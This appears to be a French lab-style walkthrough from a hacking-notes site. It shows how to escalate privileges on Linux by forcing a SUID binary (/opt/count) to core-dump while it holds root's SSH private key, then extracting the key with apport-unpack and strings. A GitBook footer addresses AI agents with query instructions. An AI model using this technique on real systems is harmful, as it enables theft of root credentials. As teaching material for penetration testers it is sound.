> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/suid/suid-core-dump-opt-count-linux-privilege-escalation.md).

# Dump mémoire SUID /opt/count - Élévation de privilèges Linux

## Ce que c’est

Les binaires SUID s’exécutent avec les privilèges de leur propriétaire, souvent root. Un binaire SUID vulnérable, obsolète ou trop flexible peut lire des fichiers protégés, lancer un shell privilégié ou exécuter du code contrôlé par l’attaquant. Cette page spécifique se concentre sur **SUID - Vidage mémoire (/opt/count)** et maintient le flux d’exploitation pratique : identifiez la condition, validez-la en toute sécurité, puis exécutez la charge utile minimale nécessaire pour prouver l’impact.

## Énumération

Commencez par confirmer le contexte local et la mauvaise configuration exacte avant d’exécuter la voie d’exploitation.

```bash
find / -perm -4000 -type f 2>/dev/null
```

## Exemples

Utilisez la commande suivante pour rechercher les privilèges SUID disponibles pour notre utilisateur :

```bash
find / -perm -4000 2>/dev/null
```

Nous trouvons un fichier rare situé dans `/opt/count`, appartenant à `root`.

<figure><img src="/files/8caf6dc6e5f60a4474a9503cee38484ecdbe828f" alt=""><figcaption></figcaption></figure>

Lorsque ce binaire s'exécute, il demande un fichier, puis affiche le nombre total de caractères, de mots et de lignes. Le script lit le contenu du fichier et affiche ses propriétés.

<figure><img src="/files/bb63d7d8a6d6c9585865e27c2d86686ffaa10b16" alt="" width="563"><figcaption></figcaption></figure>

### Binaire de core dump

En examinant le code source, nous pouvons observer qu'un core dump est généré, stockant temporairement le contenu en cas d'erreur.

<figure><img src="/files/25b8a0900a8f0dea3b60b4767e656814a04c4a93" alt=""><figcaption></figcaption></figure>

Les erreurs sont enregistrées dans le `/var/crash` répertoire. Voici comment créer un core dump :

1. **Entrez le nom du fichier ou du répertoire :**

   ```bash
   Entrez le nom du fichier/répertoire source : /root/.ssh/id_rsa
   ```

   (clé SSH root)
2. \*\*Enregistrer les résultats dans un fichier ? \*\*

   ```css
   Enregistrer les résultats dans un fichier ? [y/N] : ^Z
   ```

   (Arrière-plan)
3. **Obtenez le PID :**

   ```bash
   ps
   ```

   *(Copier le PID)*
4. **Terminer le processus :**

   ```bash
   kill -BUS 'PID'
   ```
5. **Relancez le binaire :**

   ```bash
   fg
   ```
6. **Vérifiez le répertoire des core dumps :**

   ```bash
   ls -l /var/crash
   ```

   (Un nouveau fichier apparaît : `_opt_count.1000.crash`)

<figure><img src="/files/087b8230c2388cde861f208197072046e8f4bdb3" alt=""><figcaption></figcaption></figure>

Nous avons maintenant un core dump en base64 contenant la clé SSH root.

<figure><img src="/files/3f6312251252e3f459d67a218e6e4b05beddbfdf" alt=""><figcaption></figcaption></figure>

### apport-unpack

Pour extraire les informations, nous utiliserons `apport-unpack`:

```bash
apport-unpack /var/crash/_opt_count.1000.crash /tmp/ssh
```

Ensuite, nous allons lister le contenu du fichier dans `/tmp/ssh/coredump` en utilisant `strings`:

<figure><img src="/files/7a2d09b18c11fe28fde2012b7eef8319f6a541ea" alt=""><figcaption></figcaption></figure>

Nous trouvons la clé SSH de root

<figure><img src="/files/2248ca6fe61248533a1d4e760315be59c3f0bc2a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/suid/suid-core-dump-opt-count-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
